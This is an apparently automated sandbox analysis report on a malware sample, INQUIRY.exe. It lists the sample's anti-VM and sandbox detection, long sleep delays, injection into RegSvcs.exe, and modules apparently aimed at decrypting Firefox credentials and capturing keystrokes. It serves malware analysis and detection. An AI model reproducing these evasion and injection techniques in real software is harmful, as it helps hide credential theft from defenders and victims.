              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Yara detected AntiVM3
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7348, type: MEMORYSTR
              Switches to a custom stack to bypass stack traces
              Source: C:\Users\user\Desktop\INQUIRY.exeAPI/Special instruction interceptor: Address: 1DA3224
              Source: C:\Users\user\Desktop\INQUIRY.exeAPI/Special instruction interceptor: Address: 1013224
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: INQUIRY.exe, 00000000.00000002.1694523249.00000000010D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEE
              Source: INQUIRY.exe, 00000002.00000002.1709315154.0000000001058000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEOR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,3_2_004019F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599671Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599343Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599124Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599015Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598906Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598796Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598687Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598578Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598468Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598359Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598250Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598140Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598031Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597921Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597812Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597703Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597593Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597484Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597373Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597265Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597156Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597046Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596937Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596828Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596718Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596609Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596500Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596390Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596281Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596171Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596062Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595953Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595843Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595734Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595624Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595515Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595406Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595296Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595186Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595077Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594966Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594859Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594750Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594640Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7841Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2015Jump to behavior
              Source: C:\Users\user\Desktop\INQUIRY.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-104894
              Source: C:\Users\user\Desktop\INQUIRY.exeAPI coverage: 4.9 %
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A7445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00A7445A
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A7C6D1 FindFirstFileW,FindClose,0_2_00A7C6D1
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A7C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00A7C75C
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A7EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00A7EF95
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A7F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00A7F0F2
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A7F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00A7F3F3
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00A737EF
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A73B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00A73B12
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A7BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00A7BCBC
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00A149A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599671Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599343Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599124Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599015Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598906Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598796Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598687Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598578Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598468Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598359Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598250Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598140Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598031Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597921Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597812Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597703Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597593Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597484Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597373Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597265Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597156Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597046Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596937Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596828Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596718Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596609Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596500Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596390Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596281Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596171Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596062Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595953Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595843Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595734Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595624Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595515Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595406Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595296Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595186Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595077Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594966Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594859Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594750Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594640Jump to behavior
              Source: RegSvcs.exe, 00000003.00000002.4149809220.000000000119E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\INQUIRY.exeAPI call chain: ExitProcess graph end nodegraph_0-103667
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI call chain: ExitProcess graph end node
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A83F09 BlockInput,0_2_00A83F09
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A13B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00A13B3A
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A45A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00A45A7C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,3_2_004019F0
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A14B37 LoadLibraryA,GetProcAddress,0_2_00A14B37
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_01DA34F0 mov eax, dword ptr fs:[00000030h]0_2_01DA34F0
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_01DA3490 mov eax, dword ptr fs:[00000030h]0_2_01DA3490
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_01DA1E70 mov eax, dword ptr fs:[00000030h]0_2_01DA1E70
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_01013490 mov eax, dword ptr fs:[00000030h]2_2_01013490
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_010134F0 mov eax, dword ptr fs:[00000030h]2_2_010134F0
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_01011E70 mov eax, dword ptr fs:[00000030h]2_2_01011E70
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A680A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_00A680A9
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A3A124 SetUnhandledExceptionFilter,0_2_00A3A124
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A3A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A3A155
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0040CE09
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0040E61C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00416F6A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004123F1 SetUnhandledExceptionFilter,3_2_004123F1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              .NET source code references suspicious native API functions
              Source: 3.2.RegSvcs.exe.5630000.8.raw.unpack, UltraSpeed.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
              Source: 3.2.RegSvcs.exe.5630000.8.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
              Source: 3.2.RegSvcs.exe.5630000.8.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
              Maps a DLL or memory area into another process
              Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: DAC008Jump to behavior
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A687B1 LogonUserW,0_2_00A687B1
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A13B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00A13B3A
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A148D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00A148D7
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A74C27 mouse_event,0_2_00A74C27
              Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\INQUIRY.exe"Jump to behavior
              Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\INQUIRY.exe"Jump to behavior
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A67CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00A67CAF
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A6874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00A6874B
              Source: INQUIRY.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
              Source: INQUIRY.exeBinary or memory string: Shell_TrayWnd
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A3862B cpuid 0_2_00A3862B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoA,3_2_00417A20
